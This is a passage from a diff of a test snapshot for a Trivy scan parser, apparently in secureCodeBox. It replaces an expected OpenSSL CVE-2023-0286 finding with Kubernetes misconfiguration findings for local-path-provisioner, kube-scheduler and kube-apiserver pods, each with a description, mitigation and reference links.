"https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0040", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0040", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Edit the Scheduler pod specification file /etc/kubernetes/manifests/kube-scheduler.yaml file on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://avd.aquasec.com/misconfig/kcv0040", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0286", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0286", - "https://access.redhat.com/security/cve/cve-2023-0286", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", - "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", - "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", - "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", - "https://linux.oracle.com/cve/CVE-2023-0286.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", - "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0286", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", ], }, - "category": "Vulnerability", - "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "X.400 address type confusion in X.509 GeneralName", + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.volumes.hostPath')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0286", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0286", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2023-0286", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0001", + ], + }, + "category": "Misconfiguration", + "description": "Disable anonymous requests to the API server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set '--anonymous-auth' to 'false'.", + "name": "Ensure that the --anonymous-auth argument is set to false(Ensure that the --anonymous-auth argument is set to false)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://avd.aquasec.com/misconfig/kcv0001", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0006", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0006", + ], + }, + "category": "Misconfiguration", + "description": "Verify kubelet's certificate before establishing connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Follow the Kubernetes documentation and setup the TLS connection between the apiserver and kubelets. ", + "name": "Ensure that the --kubelet-certificate-authority argument is set as appropriate(Ensure that the --kubelet-certificate-authority argument is set as appropriate)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://avd.aquasec.com/misconfig/kcv0006", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0010", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0010", + ], + }, + "category": "Misconfiguration", + "description": "Limit the rate at which the API server accepts requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Follow the Kubernetes documentation and set the desired limits in a configuration file. Then, edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml and set the below parameters.", + "name": "Ensure that the admission control plugin EventRateLimit is set(Ensure that the admission control plugin EventRateLimit is set)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://avd.aquasec.com/misconfig/kcv0010", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV0012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/ksv0012", + ], + }, + "category": "Misconfiguration", + "description": "Always pull images.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include AlwaysPullImages.", + "name": "Ensure that the admission control plugin AlwaysPullImages is set(Ensure that the admission control plugin AlwaysPullImages is set)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://avd.aquasec.com/misconfig/ksv0012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0013", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0013", + ], + }, + "category": "Misconfiguration", + "description": "The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. This should be used where PodSecurityPolicy is not in place within the cluster.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include SecurityContextDeny, unless PodSecurityPolicy is already in place.", + "name": "Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used(Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://avd.aquasec.com/misconfig/kcv0013", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0018", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file 